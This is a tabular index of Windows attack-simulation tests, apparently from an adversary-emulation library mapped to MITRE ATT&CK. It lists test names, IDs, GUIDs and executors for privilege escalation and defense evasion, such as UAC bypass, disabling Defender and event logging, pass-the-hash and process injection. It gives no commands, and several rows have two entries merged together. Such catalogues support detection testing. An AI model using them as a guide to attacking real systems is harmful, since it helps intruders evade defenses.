57 privilege-escalation T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
privilege-escalation T1543.003 Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
58 privilege-escalation T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
59 privilege-escalation T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
60 privilege-escalation T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
62 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
63 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
64 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
65 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) Bits download using destktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
66 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
67 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
68 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
69 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
70 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
71 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
72 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
defense-evasion T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
defense-evasion T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
defense-evasion T1548.002 Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
defense-evasion T1548.002 Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
defense-evasion T1548.002 Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
defense-evasion T1548.002 Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
defense-evasion T1548.002 Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
defense-evasion T1548.002 Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
defense-evasion T1548.002 Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
defense-evasion T1548.002 Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
73 defense-evasion T1218.003 CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
74 defense-evasion T1218.003 CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
75 defense-evasion T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
76 defense-evasion T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
77 defense-evasion T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
defense-evasion T1070.003 Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
defense-evasion T1070.003 Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
78 defense-evasion T1070.001 Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
79 defense-evasion T1070.001 Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
defense-evasion T1070.001 Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
80 defense-evasion T1027.004 Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
81 defense-evasion T1027.004 Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
82 defense-evasion T1218.001 Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
87 defense-evasion T1218.001 Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
88 defense-evasion T1218.001 Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
89 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
90 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
91 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
92 defense-evasion T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
defense-evasion T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
93 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
94 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
95 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
96 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
97 defense-evasion T1562.002 Disable Windows Event Logging 2 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
98 defense-evasion T1562.002 T1562.004 Disable Windows Event Logging Disable or Modify System Firewall 3 2 Impair Windows Audit Log Policy Disable Microsoft Defender Firewall 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
defense-evasion T1562.002 Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
defense-evasion T1562.002 Disable Windows Event Logging 5 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
defense-evasion T1562.002 Disable Windows Event Logging 6 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
defense-evasion T1562.004 Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
defense-evasion T1562.004 Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
99 defense-evasion T1562.004 Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
100 defense-evasion T1562.004 Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
101 defense-evasion T1562.004 Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
115 defense-evasion T1562.001 Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
116 defense-evasion T1562.001 Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
117 defense-evasion T1562.001 Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
defense-evasion T1562.001 Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
defense-evasion T1562.001 Disable or Modify Tools 27 Disable Defender with Defender Control 178136d8-2778-4d7a-81f3-d517053a4fd6 powershell
defense-evasion T1562.001 Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
defense-evasion T1562.001 Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
defense-evasion T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
118 defense-evasion T1070.004 File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
119 defense-evasion T1070.004 File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
120 defense-evasion T1070.004 File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
123 defense-evasion T1070.004 File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
124 defense-evasion T1564.001 Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
125 defense-evasion T1564.001 Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
defense-evasion T1564.001 Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
126 defense-evasion T1564.003 Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
defense-evasion T1562.006 Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
defense-evasion T1562.006 Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
defense-evasion T1562.006 Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
127 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
128 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
129 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
130 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
131 defense-evasion T1553.004 Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
defense-evasion T1553.004 Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
defense-evasion T1553.004 Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
132 defense-evasion T1218.004 InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
133 defense-evasion T1218.004 InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
134 defense-evasion T1218.004 InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
137 defense-evasion T1218.004 InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
138 defense-evasion T1218.004 InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
139 defense-evasion T1218.004 InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
140 defense-evasion T1078.003 T1127.001 Local Accounts MSBuild 1 Create local account with admin privileges MSBuild Bypass Using Inline Tasks a524ce99-86de-4db6-b4f9-e08f35a47a15 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
defense-evasion T1127.001 MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
defense-evasion T1127.001 MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
defense-evasion T1553.005 Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
defense-evasion T1553.005 Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
defense-evasion T1553.005 Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
141 defense-evasion T1036.004 Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
142 defense-evasion T1036.004 Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
defense-evasion T1036.005 Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
143 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
144 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
145 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
146 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
147 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
148 defense-evasion T1218.005 Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
149 defense-evasion T1218.005 Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
150 defense-evasion T1218.005 Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
154 defense-evasion T1218.005 Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
155 defense-evasion T1218.005 Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
156 defense-evasion T1218.005 Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
157 defense-evasion T1218.005 T1218.007 Mshta Msiexec 10 1 Mshta used to Execute PowerShell Msiexec.exe - Execute Local MSI file 8707a805-2b76-4f32-b1c0-14e558205772 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 command_prompt
158 defense-evasion T1218.007 Msiexec 1 2 Msiexec.exe - Execute Local MSI file with embedded JScript Msiexec.exe - Execute Remote MSI file a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 bde7d2fe-d049-458d-a362-abda32a7e649 command_prompt
159 defense-evasion T1218.007 Msiexec 2 3 Msiexec.exe - Execute Local MSI file with embedded VBScript Msiexec.exe - Execute Arbitrary DLL 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 66f64bd5-7c35-4c24-953a-04ca30a0a0ec command_prompt
defense-evasion T1218.007 Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
defense-evasion T1218.007 Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
defense-evasion T1218.007 Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
defense-evasion T1218.007 Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
defense-evasion T1218.007 Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
defense-evasion T1218.007 Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
defense-evasion T1218.007 Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
defense-evasion T1218.007 Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
defense-evasion T1218.007 Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
160 defense-evasion T1564.004 NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
161 defense-evasion T1564.004 NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
162 defense-evasion T1564.004 NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
164 defense-evasion T1070.005 Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
165 defense-evasion T1070.005 Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
166 defense-evasion T1070.005 Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
defense-evasion T1070.005 Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
defense-evasion T1070.005 Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
167 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
168 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
169 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
170 defense-evasion T1218.008 Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
171 defense-evasion T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
172 defense-evasion T1134.004 Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
175 defense-evasion T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
176 defense-evasion T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
177 defense-evasion T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
defense-evasion T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
178 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
defense-evasion T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
179 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
180 defense-evasion T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
181 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
182 defense-evasion T1055.012 T1055 Process Hollowing Process Injection 2 1 RunPE via VBA Process Injection via mavinject.exe 3ad4a037-1598-4136-837c-4027e4fa319b 74496461-11a1-4982-b439-4d87a550d254 powershell
defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
183 defense-evasion T1216.001 PubPrn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
184 defense-evasion T1218.009 Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
185 defense-evasion T1218.009 Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
187 defense-evasion T1218.010 Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
188 defense-evasion T1218.010 Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
189 defense-evasion T1218.010 Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
defense-evasion T1218.010 Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
190 defense-evasion T1036.003 Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
191 defense-evasion T1036.003 Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
192 defense-evasion T1036.003 Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
195 defense-evasion T1036.003 Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
